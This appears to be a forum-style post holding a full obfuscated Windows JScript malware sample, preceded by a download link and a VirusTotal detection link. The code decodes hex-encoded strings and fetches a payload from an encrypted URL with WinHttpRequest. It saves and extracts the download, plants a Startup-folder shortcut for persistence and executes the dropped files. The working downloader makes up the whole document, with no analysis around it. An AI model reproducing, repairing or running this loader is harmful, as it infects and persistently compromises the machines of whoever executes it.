https://kafanealg.lanzous.com/ic2a8gd
https://www.virustotal.com/gui/file/a16a976d97f70dc3f5ca56947d9b5ba04df0f334c2a4cea6be69382f7222c7c1/detection
Code:
- var mCDLTm326EEFfcM, NeLAfN261awHjUF, ELdfBi332DUEUjf, dyAcyg844TLcfwH, lWCBYo931lwPXPB, fydCTp921DIEjQc, ilCiAP415wwcDMM, MTpBip432FDIydl, gkzcLY449WcTVDg, ElITzo596QMLpTk, MkAeDg071LwcAcy, pooNCi658DCWnHC, FFBCBU395pglDPP, DFYKUB619ydgXLc, nTBQIP685DAAyFo, TiNgQw227dpcyHe, YmHDcf996EmNQAw, jNjEHT860IAwYdP, XXFiLE178CNknmD, PgPyLE536NNlEDX, neFNgN802VepDCo, XXFiLE178CNknmD, YyfKkd827NeAFMF, iPyWUy974KLgFUV, wLXNDE459dTjzlo, kDDIXM769dFmDAL, gEIpQV540DinNne;
- (function() {
- var _0x11E03 = ["\x67\x65\x74\x54\x69\x6D\x65", "", "\x6C\x65\x6E\x67\x74\x68", "\x73\x75\x62\x73\x74\x72", "\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74", "\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65", "\x6A\x56\x51\x4D\x50\x59\x38\x39\x32\x4D\x4B\x43\x48\x6C\x56", "\x33\x43\x43\x45\x31\x35\x44\x38\x30\x34\x36\x45\x43\x34\x43\x42\x43\x35\x43\x43\x42\x30\x39\x35\x38\x34\x46\x46\x35\x34\x44\x34\x36\x44\x43\x38\x41\x38\x39\x42\x39\x44\x38\x38\x38\x37\x38\x46\x46\x41\x36\x36\x44\x34\x34\x36\x33\x46\x31\x44\x30\x32\x35\x33\x44\x31\x35\x32\x43\x36\x41\x45\x42\x39\x44\x30\x33\x38\x35\x41\x44\x45\x34\x34\x33\x36\x32\x37\x33\x35\x33\x33\x30\x39\x36\x43\x46\x34\x36\x33\x43\x33\x41\x41\x45\x35\x32\x36\x36\x36\x38\x30\x41\x37\x35\x38", "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72", "\x63\x68\x61\x72\x41\x74", "\x57\x69\x6E\x48\x74\x74\x70\x2E\x57\x69\x6E\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x2E\x35\x2E\x31", "\x53\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x73", "\x47\x45\x54", "\x4F\x70\x65\x6E", "\x53\x65\x6E\x64", "\x53\x74\x61\x74\x75\x73", "\x52\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79", "\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D", "\x54\x79\x70\x65", "\x57\x72\x69\x74\x65", "\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65", "\x43\x6C\x6F\x73\x65", "\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74", "\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E", "\x2E", "\x46\x6F\x6C\x64\x65\x72\x45\x78\x69\x73\x74\x73", "\x43\x72\x65\x61\x74\x65\x46\x6F\x6C\x64\x65\x72", "\x50\x61\x74\x68", "\x67\x65\x74\x46\x6F\x6C\x64\x65\x72", "\x4E\x61\x6D\x65\x53\x70\x61\x63\x65", "\x67\x65\x74\x46\x69\x6C\x65", "\x46\x69\x6C\x65\x45\x78\x69\x73\x74\x73", "\x49\x74\x65\x6D\x73", "\x43\x6F\x70\x79\x48\x65\x72\x65", "\x64\x65\x6C\x65\x74\x65\x66\x69\x6C\x65", "\x38\x45\x44\x36\x36\x41\x42\x33\x35\x34", "\x32\x39\x33\x44\x46\x37\x33\x35\x45\x43", "\x6A\x43\x65\x49\x70\x41\x34\x38\x36\x6A\x79\x54\x67\x55\x51", "\x32\x42\x33\x33\x46\x42\x33\x34\x45\x39", "\x44\x30\x37\x45\x45\x45\x31\x41\x33\x42\x44\x42\x31\x37\x42\x45\x31\x46\x41\x33\x34\x38\x46\x45\x32\x30\x43\x39\x35\x32\x45\x35\x32\x38\x44\x32", "\x47\x65\x74\x46\x6F\x6C\x64\x65\x72", "\x66\x69\x6C\x65\x73", "\x61\x74\x45\x6E\x64", "\x6D\x6F\x76\x65\x4E\x65\x78\x74", "\x73\x69\x7A\x65", "\x69\x74\x65\x6D", "\x4D\x6F\x76\x65\x46\x69\x6C\x65", "\x5C\x54\x69\x56\x45\x7A\x44\x37\x30\x36\x64\x63\x50\x4E\x61\x70", "\x51\x75\x69\x74", "\x43\x72\x65\x61\x74\x65\x54\x65\x78\x74\x46\x69\x6C\x65", "\x44\x45\x6D\x6F\x4E\x6E\x35\x31\x39\x44\x44\x6F\x49\x44\x43", "\x57\x72\x69\x74\x65\x4C\x69\x6E\x65", "\x5C\x4D\x54\x70\x42\x69\x70\x34\x33\x32\x46\x44\x49\x79\x64\x6C", "\x5C", "\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C", "\x34\x46\x43\x38\x36\x42\x39\x44\x35\x44\x38\x31\x41\x46\x31\x38", "\x53\x70\x65\x63\x69\x61\x6C\x46\x6F\x6C\x64\x65\x72\x73", "\x2E\x6C\x6E\x6B", "\x43\x72\x65\x61\x74\x65\x53\x68\x6F\x72\x74\x63\x75\x74", "\x54\x61\x72\x67\x65\x74\x50\x61\x74\x68", "\x41\x72\x67\x75\x6D\x65\x6E\x74\x73", "\x20", "\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E", "\x79\x70\x64\x49\x44\x6E\x33\x37\x33\x4E\x50\x4E\x56\x69\x69", "\x48\x6F\x74\x6B\x65\x79", "\x49\x63\x6F\x6E\x4C\x6F\x63\x61\x74\x69\x6F\x6E", "\x36\x43\x42\x46\x37\x33\x42\x41\x36\x36\x38\x32\x41\x38\x32\x33\x42\x31\x45\x44\x31\x45\x44\x44\x30\x30", "\x57\x69\x6E\x64\x6F\x77\x53\x74\x79\x6C\x65", "\x57\x6F\x72\x6B\x69\x6E\x67\x44\x69\x72\x65\x63\x74\x6F\x72\x79", "\x53\x61\x76\x65", "\x52\x75\x6E"];
- function _0x11E20(_0x11E20) {
- var _0x11E5A = new Date();
- var _0x11E77 = 0;
- while (_0x11E77 < (_0x11E20 * 1000)) {
- var _0x11E3D = new Date();
- var _0x11E77 = _0x11E3D[_0x11E03[0]]() - _0x11E5A[_0x11E03[0]]()
- }
- }
- function _0x11E3D(_0x11EEB) {
- if (_0x11EEB == _0x11E03[1]) {
- return
- };
- var _0x11ECE = ELdfBi332DUEUjf[_0x11E03[2]];
- var _0x11E77 = -1;
- var _0x11EB1 = 0;
- var _0x11E20 = _0x11E03[1];
- var _0x11E5A = 0;
- var _0x11E94 = 0;
- var _0x11E3D = 0;
- _0x11EB1 = parseInt(_0x11EEB[_0x11E03[3]](0, 2), 16);
- for (_0x11E5A = 2; _0x11E5A < _0x11EEB[_0x11E03[2]]; _0x11E5A += 2) {
- _0x11E94 = parseInt(_0x11EEB[_0x11E03[3]](_0x11E5A, 2), 16);
- if (_0x11E77 < _0x11ECE - 1) {
- _0x11E77++
- } else {
- _0x11E77 = 0
- };
- _0x11E3D = _0x11E94 ^ ELdfBi332DUEUjf[_0x11E03[4]](_0x11E77);
- if (_0x11E3D <= _0x11EB1) {
- _0x11E3D = 255 + _0x11E3D - _0x11EB1
- } else {
- _0x11E3D = _0x11E3D - _0x11EB1
- };
- _0x11E20 += String[_0x11E03[5]](_0x11E3D);
- _0x11EB1 = _0x11E94
- };
- return _0x11E20
- }
- function _0x11E5A(_0x11E5A) {
- var _0x11E77 = _0x11E03[1];
- var _0x11E3D = _0x11E03[8];
- for (var _0x11E20 = 0; _0x11E20 < _0x11E5A; _0x11E20++) {
- _0x11E77 += _0x11E3D[_0x11E03[11]](Math[_0x11E03[10]](Math[_0x11E03[9]]() * _0x11E3D[_0x11E03[2]]))
- };
- return _0x11E77
- }
- function _0x11E77(_0x11E94, _0x11E77) {
- var _0x11E3D;
- var _0x11E5A;
- try {
- var _0x11E20 = new ActiveXObject(_0x11E03[12]);
- _0x11E20[_0x11E03[13]](30000, 30000, 30000, 5000);
- void(((_0x11E20[_0x11E03[15]](_0x11E03[14], _0x11E94, false))));
- _0x11E20[_0x11E03[16]]();
- if (_0x11E20[_0x11E03[17]] == 404) {
- return false
- };
- _0x11E3D = _0x11E20[_0x11E03[18]]
- } catch (ex) {
- return false
- };
- _0x11E5A = new ActiveXObject(_0x11E03[19]);
- _0x11E5A[_0x11E03[20]] = 1;
- _0x11E5A[_0x11E03[15]]();
- _0x11E5A[_0x11E03[21]](_0x11E3D);
- _0x11E5A[_0x11E03[22]](_0x11E77, 2);
- _0x11E5A[_0x11E03[23]]();
- return true
- }
- function _0x11E94(_0x11E5A, _0x11E94) {
- var _0x11EB1 = new ActiveXObject(((_0x11E03[24]))),
- _0x11E77 = new ActiveXObject((_0x11E03[25])),
- _0x11E20, _0x11E3D;
- if (!_0x11E94) {
- _0x11E94 = _0x11E03[26]
- };
- if (!_0x11EB1[_0x11E03[27]](_0x11E94)) {
- _0x11EB1[_0x11E03[28]](_0x11E94)
- };
- _0x11E20 = _0x11E77[_0x11E03[31]](_0x11EB1[_0x11E03[30]](_0x11E94)[_0x11E03[29]]);
- _0x11E3D = _0x11E77[_0x11E03[31]](_0x11EB1[_0x11E03[32]](_0x11E5A)[_0x11E03[29]]);
- if (_0x11EB1[_0x11E03[33]](_0x11E5A)) {
- _0x11E20[_0x11E03[35]](_0x11E3D[_0x11E03[34]](), 4 + 16);
- _0x11EB1[_0x11E03[36]](_0x11E5A)
- }
- }
- function _0x11EB1(_0x11E3D) {
- var _0x11EB1, _0x11ECE, _0x11E77, _0x11E5A, _0x11E20;
- _0x11ECE = new ActiveXObject(((_0x11E03[24])));
- var _0x11E94;
- _0x11E94 = new ActiveXObject(((_0x11E03[24])));
- _0x11EB1 = new ActiveXObject(((_0x11E03[24])));
- _0x11E77 = _0x11EB1[_0x11E03[42]](_0x11E3D);
- _0x11E5A = new Enumerator(_0x11E77[_0x11E03[43]]);
- _0x11E20 = _0x11E03[1];
- for (; !_0x11E5A[_0x11E03[44]](); _0x11E5A[_0x11E03[45]]()) {
- if (_0x11E5A[_0x11E03[47]]()[_0x11E03[46]] >= 1000007) {
- _0x11E94[_0x11E03[48]](_0x11E5A[_0x11E03[47]](), _0x11E3D + pooNCi658DCWnHC);
- FFBCBU395pglDPP = _0x11E3D + pooNCi658DCWnHC
- } else {
- if (_0x11E5A[_0x11E03[47]]()[_0x11E03[46]] < 10007) {
- _0x11E94[_0x11E03[48]](_0x11E5A[_0x11E03[47]](), _0x11E3D + ElITzo596QMLpTk);
- nTBQIP685DAAyFo = _0x11E3D + ElITzo596QMLpTk
- } else {
- if (_0x11E5A[_0x11E03[47]]()[_0x11E03[46]] < 1000007 & _0x11E5A[_0x11E03[47]]()[_0x11E03[46]] > 300007) {
- _0x11E94[_0x11E03[48]](_0x11E5A[_0x11E03[47]](), _0x11E3D + gkzcLY449WcTVDg);
- DFYKUB619ydgXLc = _0x11E3D + gkzcLY449WcTVDg
- }
- }
- }
- };
- return _0x11E20
- }
- mCDLTm326EEFfcM = _0x11E20;
- NeLAfN261awHjUF = _0x11E3D;
- lWCBYo931lwPXPB = _0x11E5A;
- fydCTp921DIEjQc = _0x11E77;
- ilCiAP415wwcDMM = _0x11E94;
- jNjEHT860IAwYdP = _0x11EB1;
- ELdfBi332DUEUjf = _0x11E03[6];
- dyAcyg844TLcfwH = _0x11E3D(_0x11E03[7]);
- MTpBip432FDIydl = _0x11E5A(8);
- gkzcLY449WcTVDg = _0x11E5A(8) + (_0x11E3D(_0x11E03[37]));
- ElITzo596QMLpTk = _0x11E5A(8);
- MkAeDg071LwcAcy = _0x11E5A(8);
- pooNCi658DCWnHC = MkAeDg071LwcAcy + (_0x11E3D(_0x11E03[38]));
- TiNgQw227dpcyHe = _0x11E03[39] + (_0x11E3D(_0x11E03[40]));
- YmHDcf996EmNQAw = _0x11E3D(_0x11E03[41]);
- _0x11E20(2);
- _0x11E20(2);
- XXFiLE178CNknmD = new ActiveXObject(_0x11E03[24]);
- if (XXFiLE178CNknmD[_0x11E03[33]](YmHDcf996EmNQAw + _0x11E03[49])) {
- WScript[_0x11E03[50]]()
- } else {
- try {
- PgPyLE536NNlEDX = new ActiveXObject(_0x11E03[24]);
- neFNgN802VepDCo = PgPyLE536NNlEDX[_0x11E03[51]](YmHDcf996EmNQAw + _0x11E03[49], true);
- neFNgN802VepDCo[_0x11E03[53]](_0x11E03[52]);
- neFNgN802VepDCo[_0x11E03[23]]()
- } catch (ex) {}
- };
- _0x11E20(2);
- XXFiLE178CNknmD = new ActiveXObject(((_0x11E03[24])));
- if (XXFiLE178CNknmD[_0x11E03[27]](YmHDcf996EmNQAw + _0x11E03[54])) {} else {
- try {
- YyfKkd827NeAFMF = new ActiveXObject(((_0x11E03[24])));
- YyfKkd827NeAFMF[_0x11E03[28]](YmHDcf996EmNQAw + _0x11E03[55] + MTpBip432FDIydl);
- _0x11E20(2);
- iPyWUy974KLgFUV = new ActiveXObject((_0x11E03[56]));
- ladopW576EAVDIY = iPyWUy974KLgFUV[_0x11E03[58]](_0x11E3D(_0x11E03[57]));
- wLXNDE459dTjzlo = iPyWUy974KLgFUV[_0x11E03[60]](ladopW576EAVDIY + _0x11E03[55] + _0x11E5A(8) + (_0x11E03[59]));
- wLXNDE459dTjzlo[_0x11E03[61]] = YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + gkzcLY449WcTVDg;
- wLXNDE459dTjzlo[_0x11E03[62]] = _0x11E03[63] + YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + ElITzo596QMLpTk + _0x11E03[63] + YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + pooNCi658DCWnHC;
- wLXNDE459dTjzlo[_0x11E03[64]] = _0x11E03[65];
- wLXNDE459dTjzlo[_0x11E03[66]] = _0x11E03[1];
- wLXNDE459dTjzlo[_0x11E03[67]] = (_0x11E3D(_0x11E03[68]));
- wLXNDE459dTjzlo[_0x11E03[69]] = 7;
- wLXNDE459dTjzlo[_0x11E03[70]] = YmHDcf996EmNQAw + MTpBip432FDIydl;
- wLXNDE459dTjzlo[_0x11E03[71]]()
- } catch (ex) {};
- _0x11E20(2);
- _0x11E20(2);
- _0x11E77(dyAcyg844TLcfwH, YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + TiNgQw227dpcyHe);
- _0x11E20(2);
- _0x11E20(2);
- _0x11E94(YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + TiNgQw227dpcyHe, YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55]);
- _0x11E20(2);
- _0x11E20(2);
- _0x11E20(2);
- _0x11EB1(YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55]);
- _0x11E20(2);
- _0x11E20(2);
- kDDIXM769dFmDAL = new ActiveXObject((_0x11E03[56]));
- gEIpQV540DinNne = new ActiveXObject(((_0x11E03[24])));
- if (gEIpQV540DinNne[_0x11E03[33]](DFYKUB619ydgXLc)) {
- kDDIXM769dFmDAL[_0x11E03[72]](String[_0x11E03[5]](34) + YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + gkzcLY449WcTVDg + String[_0x11E03[5]](34) + String[_0x11E03[5]](32) + String[_0x11E03[5]](34) + YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + ElITzo596QMLpTk + String[_0x11E03[5]](34) + String[_0x11E03[5]](32) + String[_0x11E03[5]](34) + YmHDcf996EmNQAw + MTpBip432FDIydl + _0x11E03[55] + pooNCi658DCWnHC + String[_0x11E03[5]](34))
- };
- _0x11E20(11)
- }
- })()
复制代码
|